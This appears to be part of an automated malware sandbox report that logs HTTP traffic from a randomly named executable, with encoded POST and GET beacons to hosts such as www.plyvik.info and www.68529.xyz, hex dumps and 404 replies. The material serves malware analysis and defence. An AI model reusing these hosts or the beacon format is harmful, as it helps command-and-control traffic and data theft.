                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                33192.168.2.84974167.223.117.142805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:16.476011992 CET675OUTPOST /ak8m/ HTTP/1.1
                                                                                                                                Host: www.plyvik.info
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.plyvik.info
                                                                                                                                Referer: http://www.plyvik.info/ak8m/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6d 6c 4e 6a 69 79 6b 7a 46 6a 6b 62 47 4e 2b 52 33 32 69 4a 76 30 44 6b 6b 54 63 55 69 42 7a 34 78 63 45 38 2b 5a 39 67 6b 49 68 56 4a 38 57 34 39 50 62 4d 31 78 32 59 79 54 5a 79 44 65 58 54 54 4a 71 71 6b 2f 35 51 44 4e 4a 62 38 42 2f 6b 38 30 4c 6e 58 56 32 4a 4f 7a 5a 65 53 6b 45 58 45 31 4f 4a 38 74 69 65 34 74 6c 70 41 39 67 73 67 32 46 49 4d 4e 65 46 59 72 79 4f 54 76 7a 58 79 31 55 59 55 4d 34 48 47 39 42 50 69 66 38 2b 70 5a 2f 53 78 6d 46 6c 74 44 7a 4e 57 76 65 78 75 76 74 4f 6b 50 78 2f 58 52 50 63 33 6c 33 59 4d 74 42 4f 49 48 45 46 64 70 78 42 37 36 76 43 69 70 71 5a 48 53 55 3d
                                                                                                                                Data Ascii: edD=mlNjiykzFjkbGN+R32iJv0DkkTcUiBz4xcE8+Z9gkIhVJ8W49PbM1x2YyTZyDeXTTJqqk/5QDNJb8B/k80LnXV2JOzZeSkEXE1OJ8tie4tlpA9gsg2FIMNeFYryOTvzXy1UYUM4HG9BPif8+pZ/SxmFltDzNWvexuvtOkPx/XRPc3l3YMtBOIHEFdpxB76vCipqZHSU=
                                                                                                                                Oct 29, 2024 16:56:17.162269115 CET533INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:17 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                34192.168.2.84974267.223.117.142805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:19.059444904 CET695OUTPOST /ak8m/ HTTP/1.1
                                                                                                                                Host: www.plyvik.info
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.plyvik.info
                                                                                                                                Referer: http://www.plyvik.info/ak8m/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6d 6c 4e 6a 69 79 6b 7a 46 6a 6b 62 48 74 4f 52 32 52 2b 4a 6b 30 44 37 68 54 63 55 6f 68 7a 38 78 63 41 38 2b 59 49 39 6b 37 46 56 4b 65 4f 34 2b 4e 2f 4d 32 78 32 59 36 7a 5a 7a 41 75 58 63 54 4a 6d 4d 6b 36 42 51 44 4e 74 62 38 45 62 6b 38 44 6e 67 58 46 32 4c 49 7a 5a 59 4b 45 45 58 45 31 4f 4a 38 73 47 6b 34 75 56 70 41 4e 77 73 6a 54 78 48 53 64 65 47 51 4c 79 4f 45 66 7a 54 79 31 56 4e 55 4e 6b 74 47 37 4e 50 69 66 73 2b 70 6f 2f 52 34 6d 46 5a 6a 6a 7a 59 65 64 50 6d 71 4f 30 76 68 2b 31 4b 66 52 50 32 79 54 47 79 57 50 4a 49 4c 48 73 75 64 71 5a 33 2b 4e 79 71 34 4b 36 70 5a 46 42 6f 4a 52 4d 35 6d 2f 38 6f 6f 63 57 53 2b 73 49 74 34 53 72 4b
                                                                                                                                Data Ascii: edD=mlNjiykzFjkbHtOR2R+Jk0D7hTcUohz8xcA8+YI9k7FVKeO4+N/M2x2Y6zZzAuXcTJmMk6BQDNtb8Ebk8DngXF2LIzZYKEEXE1OJ8sGk4uVpANwsjTxHSdeGQLyOEfzTy1VNUNktG7NPifs+po/R4mFZjjzYedPmqO0vh+1KfRP2yTGyWPJILHsudqZ3+Nyq4K6pZFBoJRM5m/8oocWS+sIt4SrK
                                                                                                                                Oct 29, 2024 16:56:19.730755091 CET533INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:19 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                35192.168.2.84974367.223.117.142805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:21.633569956 CET1712OUTPOST /ak8m/ HTTP/1.1
                                                                                                                                Host: www.plyvik.info
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.plyvik.info
                                                                                                                                Referer: http://www.plyvik.info/ak8m/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6d 6c 4e 6a 69 79 6b 7a 46 6a 6b 62 48 74 4f 52 32 52 2b 4a 6b 30 44 37 68 54 63 55 6f 68 7a 38 78 63 41 38 2b 59 49 39 6b 37 4e 56 4a 72 53 34 38 74 44 4d 33 78 32 59 30 54 5a 75 41 75 58 37 54 49 4f 49 6b 36 64 6d 44 50 6c 62 2b 6e 6a 6b 2b 79 6e 67 5a 46 32 4c 45 54 5a 5a 53 6b 45 34 45 31 65 4e 38 74 32 6b 34 75 56 70 41 4c 30 73 33 57 46 48 51 64 65 46 59 72 79 61 54 76 79 47 79 31 63 36 55 4e 77 58 48 4c 74 50 6a 2f 63 2b 79 36 6e 52 33 6d 46 68 7a 7a 79 64 65 64 43 68 71 50 5a 51 68 2b 41 52 66 54 66 32 32 48 37 6c 43 4d 5a 6f 57 32 55 4a 5a 73 68 2f 79 2f 32 77 6d 37 4b 50 62 47 78 63 4c 45 55 4b 70 2f 41 51 76 2b 72 77 70 4b 68 35 2f 6c 72 48 76 5a 63 53 4c 55 7a 51 58 6b 73 62 50 6c 78 33 7a 31 54 71 63 61 6f 63 62 46 32 69 31 32 70 44 52 76 66 79 58 6e 69 31 36 43 6e 6c 39 55 49 68 6d 64 34 71 6d 62 4c 4c 31 38 6a 70 65 43 61 6e 4d 44 69 48 6e 59 35 67 4b 73 4c 2b 70 73 6a 65 65 6d 62 50 59 6b 4b 4e 68 73 4d 30 46 77 64 42 31 48 67 50 54 52 58 36 78 48 6a 72 43 71 6c 61 64 77 [TRUNCATED]
                                                                                                                                Data Ascii: edD=mlNjiykzFjkbHtOR2R+Jk0D7hTcUohz8xcA8+YI9k7NVJrS48tDM3x2Y0TZuAuX7TIOIk6dmDPlb+njk+yngZF2LETZZSkE4E1eN8t2k4uVpAL0s3WFHQdeFYryaTvyGy1c6UNwXHLtPj/c+y6nR3mFhzzydedChqPZQh+ARfTf22H7lCMZoW2UJZsh/y/2wm7KPbGxcLEUKp/AQv+rwpKh5/lrHvZcSLUzQXksbPlx3z1TqcaocbF2i12pDRvfyXni16Cnl9UIhmd4qmbLL18jpeCanMDiHnY5gKsL+psjeembPYkKNhsM0FwdB1HgPTRX6xHjrCqladwCm+GLJackPRI9KcLa13tojVGelKgcs7iJPQakCzmcddPrdNBKk/Tcrxi9mCD2Wb3h2e8mK0l9ztzPiw2LQDHBwE+n97DFFXCJhM8FjBjnuvNbzWCt2j9VP7MkupFc1OQDTRA25tUG9znnfNnNrShIOZX366vE5ZO/R6rCSlxSNOJ7mDD2DHeIHEN1JwZBJ2oTBadlipw67xJwE4z6/HN6GMdDlrfck9MYakqFAOtWlip7saAEG1KNp162uYMAUUTdg2Dw/2uxfBFpT74hZXAixgwrp7Ki2UbteDexHQaNgLlKI5y6pjiG+9GiuixQIIaETQbCPHkIV4zRZc4h7aJs5vFseAmnkkfdmUZiycbaEMJ6dlKWKtZdcuI2c5QWNFS5olpqIwms9fBdjvBjPPsJajC5a5Pd9uwjsfYKpx3V4k7IqoxHmcuHJin/gq6bFIruWhwP1CgU8AeMuUGMRL5MyLQSR9LwM3CwE7uXQs1Tx4LFhONTGCXYtGZHQafSp3FP9tfzL0KyWWTVBXpjosMdcdeTkPs2P5z5iVVCKNIrYBVdC8uQn672k4d+GSmcPd24SvozoS0pJdWc0VU9hvalgE/gBhs2+k+IV+r0XPJ6eevJO9eAprFoFhQH5DXJFhF7d27xVs+mYLvrwN/aDxnEICNUFCjMxJRS+ [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:56:22.304447889 CET533INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:22 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                36192.168.2.84974467.223.117.142805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:24.193042040 CET426OUTGET /ak8m/?edD=rnlDhCsdJ2ooBNmRxWrIjnPAthAEmDTBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQjaYFwN3T3JuEHWt+eu64/V1Op0q2QF2dqSePIe0BpSPtA==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.plyvik.info
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:56:24.861367941 CET548INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:24 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                37192.168.2.849745107.163.130.253805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:30.667268038 CET669OUTPOST /2su7/ HTTP/1.1
                                                                                                                                Host: www.68529.xyz
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.68529.xyz
                                                                                                                                Referer: http://www.68529.xyz/2su7/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6b 59 4f 51 64 59 34 4e 6d 39 4e 31 4a 37 77 67 31 2b 70 32 45 36 6f 50 58 43 78 2f 75 57 4d 67 73 64 71 62 74 6d 69 4e 7a 55 51 58 64 43 7a 58 2f 45 4b 62 31 77 57 6f 57 41 7a 4e 79 59 74 51 53 46 64 7a 67 74 42 57 45 31 46 51 39 45 2b 4a 56 67 38 32 61 53 70 2f 68 52 48 66 48 31 39 39 72 70 36 59 50 47 44 79 36 31 7a 67 4f 39 74 64 65 46 56 39 66 6b 71 6d 37 72 57 6b 75 74 54 58 7a 30 6b 32 65 37 50 46 79 6f 57 4a 47 33 63 33 68 6f 48 50 48 31 68 37 58 78 59 6b 56 4e 36 31 42 55 44 47 46 46 46 50 58 33 42 39 51 4f 6a 54 6e 52 7a 78 6e 4e 4b 70 52 32 53 47 67 48 54 61 57 36 56 30 67 77 77 3d
                                                                                                                                Data Ascii: edD=kYOQdY4Nm9N1J7wg1+p2E6oPXCx/uWMgsdqbtmiNzUQXdCzX/EKb1wWoWAzNyYtQSFdzgtBWE1FQ9E+JVg82aSp/hRHfH199rp6YPGDy61zgO9tdeFV9fkqm7rWkutTXz0k2e7PFyoWJG3c3hoHPH1h7XxYkVN61BUDGFFFPX3B9QOjTnRzxnNKpR2SGgHTaW6V0gww=
                                                                                                                                Oct 29, 2024 16:56:31.587364912 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:31 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                38192.168.2.849746107.163.130.253805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:33.223953962 CET689OUTPOST /2su7/ HTTP/1.1
                                                                                                                                Host: www.68529.xyz
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.68529.xyz
                                                                                                                                Referer: http://www.68529.xyz/2su7/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6b 59 4f 51 64 59 34 4e 6d 39 4e 31 49 62 41 67 7a 5a 64 32 43 61 6f 4d 59 69 78 2f 67 32 4d 6b 73 64 6d 62 74 6b 50 57 7a 6d 30 58 64 6e 58 58 2b 41 57 62 32 77 57 6f 5a 67 79 6d 38 34 74 66 53 46 42 42 67 6f 70 57 45 31 35 51 39 47 32 4a 57 54 45 35 49 79 70 39 71 78 48 5a 4a 56 39 39 72 70 36 59 50 47 48 59 36 31 72 67 4f 50 35 64 52 45 56 2b 53 45 71 70 7a 4c 57 6b 71 74 54 54 7a 30 6c 54 65 2b 7a 2f 79 73 6d 4a 47 79 77 33 34 5a 48 4d 4f 31 68 35 54 78 5a 6d 57 66 72 41 47 31 48 41 4d 6d 52 51 54 57 63 46 63 59 53 35 39 7a 37 33 6b 4e 69 43 52 31 36 77 6c 77 4f 79 4d 5a 46 45 2b 6e 6d 37 49 5a 33 49 59 77 4f 4e 67 6c 55 7a 61 62 2f 49 56 61 64 6d
                                                                                                                                Data Ascii: edD=kYOQdY4Nm9N1IbAgzZd2CaoMYix/g2MksdmbtkPWzm0XdnXX+AWb2wWoZgym84tfSFBBgopWE15Q9G2JWTE5Iyp9qxHZJV99rp6YPGHY61rgOP5dREV+SEqpzLWkqtTTz0lTe+z/ysmJGyw34ZHMO1h5TxZmWfrAG1HAMmRQTWcFcYS59z73kNiCR16wlwOyMZFE+nm7IZ3IYwONglUzab/IVadm
                                                                                                                                Oct 29, 2024 16:56:34.132483006 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:33 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
